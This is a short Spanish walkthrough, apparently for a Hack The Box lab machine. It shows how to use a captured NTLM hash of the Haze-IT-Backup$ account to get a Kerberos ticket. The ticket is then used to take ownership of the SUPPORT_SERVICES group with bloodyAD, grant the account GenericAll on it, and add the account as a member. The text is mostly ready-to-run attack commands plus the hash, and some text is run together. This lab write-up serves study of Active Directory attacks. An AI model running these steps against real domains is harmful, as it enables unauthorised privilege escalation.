TGT
🛠️ OBJETIVO
Añadir la cuenta
Haze-IT-Backup$al grupoSUPPORT_SERVICESusando su hash NTLM.
🔍 PRERREQUISITOS
Requisito
Ejemplo
Dominio
haze.htb
Cuenta con hash NTLM
Haze-IT-Backup$
NTLM hash
aad3...:4de830d1d58c14e241aff55f82ecdba1
DC IP
10.10.11.61
Grupo objetivo
SUPPORT_SERVICES
🧾 PASO 1 – Obtener el TGT con getTGT.py
getTGT.pygetTGT.py haze.htb/Haze-IT-Backup$ -hashes :4de830d1d58c14e241aff55f82ecdba1Esto generará un archivo .ccache como:
Haze-IT-Backup$.ccache🧾 PASO 2 – Exportar el ticket como variable de entorno
export KRB5CCNAME=Haze-IT-Backup$.ccacheEste paso permite que otras herramientas usen ese ticket sin pedirte credenciales.
🧾 PASO 3 – Tomar propiedad del grupo con bloodyAD
bloodyADbloodyAD --host 10.10.11.61 -d haze.htb -u 'Haze-IT-Backup$' -k set owner "SUPPORT_SERVICES" "Haze-IT-Backup$"🧾 PASO 4 – Asignarte privilegios (GenericAll) al grupo
GenericAll) al grupobloodyAD --host 10.10.11.61 -d haze.htb -u 'Haze-IT-Backup$' -k add genericAll "CN=SUPPORT_SERVICES,CN=Users,DC=haze,DC=htb" "Haze-IT-Backup$"Ahora la cuenta tiene control total sobre el grupo.
🧾 PASO 5 – Añadirte al grupo (ya con permisos)
bloodyAD --host 10.10.11.61 -d haze.htb -u 'Haze-IT-Backup$' -k add groupMember "SUPPORT_SERVICES" "Haze-IT-Backup$"🔚 RESULTADO
La cuenta Haze-IT-Backup$ ya es miembro del grupo SUPPORT_SERVICES, todo usando solo su hash NTLM.
✅ EXTRA – Verificar membresía (opcional)
tarrpcclient -U 'Haze-IT-Backup$%:' 10.10.11.61
> enumdomgroups
> querygroupmem <RID de SUPPORT_SERVICES>Last updated